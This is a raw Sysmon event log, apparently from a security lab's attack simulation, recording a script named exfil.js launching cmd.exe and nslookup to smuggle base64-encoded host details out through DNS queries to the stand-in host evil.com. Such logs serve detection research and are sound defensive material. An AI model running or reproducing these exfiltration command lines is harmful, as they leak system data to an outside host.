14:21:35.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.997{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-4744-000000005F02}312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.997{2E1864BB-18E0-629A-6742-000000005F02}39764572C:\Windows\System32\WScript.exe{2E1864BB-18F0-629A-4744-000000005F02}312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.003{2E1864BB-18F0-629A-4744-000000005F02}312C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsxg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x800000000000000044806Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:36.658{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C093F3FCF3414284534E602782EC793B,SHA256=F628E9B085F21A3F704FA9A621F78FCC2D630A908A3ED977C78360FFB86EADB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000211168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.982{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbpvli.tmpMD5=1672107762ECEA7286E9D317B1D4872B,SHA256=4B917B4BC62A2EA4AC7C36E28B121764EAC51D071330300C02B5F6C0A7A1F19F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.929{2E1864BB-18F1-629A-8A44-000000005F02}37923764C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-8B44-000000005F02}4148C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.913{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-8B44-000000005F02}4148C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.913{2E1864BB-18F1-629A-8944-000000005F02}74407688C:\Windows\system32\cmd.exe{2E1864BB-18F1-629A-8B44-000000005F02}4148C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.927{2E1864BB-18F1-629A-8B44-000000005F02}4148C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F1-629A-8944-000000005F02}7440C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbpvli.tmp 2>&1 10341000x8000000000000000211159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.898{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-8A44-000000005F02}3792C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.898{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-8A44-000000005F02}3792C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.882{2E1864BB-18F1-629A-8A44-000000005F02}37923764C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-8944-000000005F02}7440C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000211156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.838{00000000-0000-0000-0000-000000000000}508evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.752{00000000-0000-0000-0000-000000000000}7488evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.676{00000000-0000-0000-0000-000000000000}8052evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.591{00000000-0000-0000-0000-000000000000}4468evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.510{00000000-0000-0000-0000-000000000000}7476evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.426{00000000-0000-0000-0000-000000000000}2824evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.329{00000000-0000-0000-0000-000000000000}7480evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.252{00000000-0000-0000-0000-000000000000}4908evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.188{00000000-0000-0000-0000-000000000000}2568evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.085{00000000-0000-0000-0000-000000000000}1216evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.011{00000000-0000-0000-0000-000000000000}5048evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.944{00000000-0000-0000-0000-000000000000}4904evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000211144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.860{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-8A44-000000005F02}3792C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.844{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-8944-000000005F02}7440C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.844{2E1864BB-18E0-629A-6742-000000005F02}39766208C:\Windows\System32\WScript.exe{2E1864BB-18F1-629A-8944-000000005F02}7440C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.852{2E1864BB-18F1-629A-8944-000000005F02}7440C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbpvli.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 